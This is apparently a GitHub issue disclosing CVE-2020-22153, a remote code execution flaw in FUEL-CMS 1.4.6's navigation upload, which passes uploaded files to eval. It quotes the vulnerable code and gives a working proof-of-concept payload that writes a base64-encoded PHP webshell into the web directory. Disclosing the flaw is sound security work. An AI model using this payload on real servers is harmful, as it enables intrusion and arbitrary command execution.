Headline
CVE-2020-22153: Code execution in navigation/upload · Issue #553 · daylightstudio/FUEL-CMS
File Upload vulnerability in FUEL-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file to the upload parameter in the navigation function.
upload function:
$This-> fuel-> navigation-> upload ($ params) was called
if (empty($file))
{
return FALSE;
}
// strip any php tags
$file = str_replace('<?php', '', $file);
// run xss_clean on it
$file = xss_clean($file);
// now evaluate the string to get the nav array
@eval($file);`
Only uploaded code <? Php tags replaced with spaces And filtered the xss tags.
Then executed the code @eval ($ file);
So we can construct php code to write webshell to web directory.
code:
file_put_contents("aaaaaa.php",base64_decode(“PD9waHAgc3lzdGVtKCRfR0VUWydpZCddKTs/Pg==”));
Because the <? Php tag is filtered, we use base64 to encode the command execution code
Then upload
Although the error is prompted, our code has been executed, and we can see the generated files on the web and directories.